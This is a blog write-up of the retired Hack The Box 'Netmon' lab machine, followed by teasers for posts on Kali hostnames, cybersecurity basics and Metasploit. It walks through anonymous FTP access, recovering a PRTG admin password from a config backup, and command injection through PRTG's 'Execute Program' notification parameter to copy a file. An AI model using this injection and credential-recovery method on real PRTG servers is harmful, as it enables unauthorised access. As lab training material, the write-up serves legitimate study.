HTB-Netmon(writeup)

-


Hack The Box - Netmon

Hey guys today Netmon retired and here’s my writeup on the machine. It was a easy machine that’s everything I can say about it.
IP of the Box : 10.10.10.152


As always we will start with nmap to scan for open ports and services :
nmap –sC –sV –A 10.10.10.152

We got ftp on port 21, http on port 80 and smb. The most interesting thing is that anonymous login is allowed on ftp. 

For user.txt

root@kali:~/Desktop/HTB/boxes/netmon# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  11:44PM       <DIR>          Administrator
06-28-19  06:43AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
06-28-19  06:49AM                   82 tester.txt
02-03-19  12:35AM                   33 user.txt
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.07 secs (0.4790 kB/s)
ftp>


cat User.txt: dd58ce67b49e15105************

Now getting root.txt
So Now in the ftp login we found something interesting which is PRTG Network Monitor Credentials

ftp> ls -al
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Application Data
02-03-19  08:05AM       <DIR>          Desktop
02-03-19  08:05AM       <DIR>          Documents
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  08:05AM       <DIR>          Start Menu
02-03-19  12:15AM       <DIR>          TEMP
02-03-19  08:05AM       <DIR>          Templates
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd Application Data/Paessler/PRTG Network Monitor
250 CWD command successful.
ftp> ls -la
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  12:40AM       <DIR>          Configuration Auto-Backups
06-28-19  06:24AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
06-28-19  06:24AM       <DIR>          Logs (Web Server)
02-25-19  08:01PM       <DIR>          Monitoring Database
06-28-19  06:54AM              1287578 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
06-28-19  06:25AM              1647701 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 3.04 secs (370.2494 kB/s)
ftp>

I got the password which was PrTg@dmin2018  :
So at first the password does not work then I thaught that it is old backup file so after some attempts I changed it to PrTg@dmin2019 and it worked :





We need to go to the notifications settings on our web browser
Click “Setup”--> Click “Notifications” in “Account Settings”-->Click “Add new notification”-->Enable “Execute Program”-->Select “Demo exe notification - outfile.ps1” as the “Program File”
   Now change the parameter to test.txt; Copy-item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\Users\Public\root.txt" 
We have to create a useless notification to exploit the vulnerability.
So root.txt: 3018977fb944b**************


Comments

Post a Comment

Popular posts from this blog

Changing Hostname in Kali Linux

-
Image
  Step1: Change in hostname fi le Change hostname fi le using nano or any other text editor  Path: /etc/hostname Command: sudo nano /etc/hostnam e Change the name from Kali → anyname Save the fi le Step2: Edit Hosts File Change Name in Hosts fi le  Path: /etc/hosts Command: sudo nano /etc/hosts Change kali to the same name as mentioned in hostname  fi le Remember all the changes can be done only in sudo  Now reboot the system to save the changes After Reboot check terminal
Read more

What is cybersecurity?

-
What is cybersecurity? Cybersecurity is the mechanism of protecting systems, networks, and programs from digital attacks.  These cyberattacks usually target to access, changing, or destroying sensitive information. What cybersecurity can prevent? Cybersecurity prevents cyberattacks, data breaches, and identity theft and can aid in risk management. When an organization has a strong point in network security and an effective incident response plan, it is better able to prevent and mitigate cyber-attacks. For example, end-user protection defends information and guards against loss or theft while also scanning computers for malicious code. Types of cybersecurity threats The process of keeping up with updated technologies, security trends and threat prevention is a challenging task . However, it's necessary in order to protect information and other assets from cyber threats, which takes in many forms, some of them are mentioned below: ·        Rans
Read more

Learn Metasploit

-
Image
Link to the room -  https://tryhackme.com/room/rpmetasploit Task1 #1  Kali and most other security distributions of Linux include Metasploit by default. If you are using a different distribution of Linux, verify that you have it installed or install it from the Rapid 7 Github repository. Answer:Not Required Task 2(Initializing) #1 First things first, we need to initialize the database! Let's do that now with the command: Command: msfdb init Answer:Not Required #2 Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: Command: msfconsole -h (-h is for help )  Answer: Not Required #3 We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to
Read more

Followers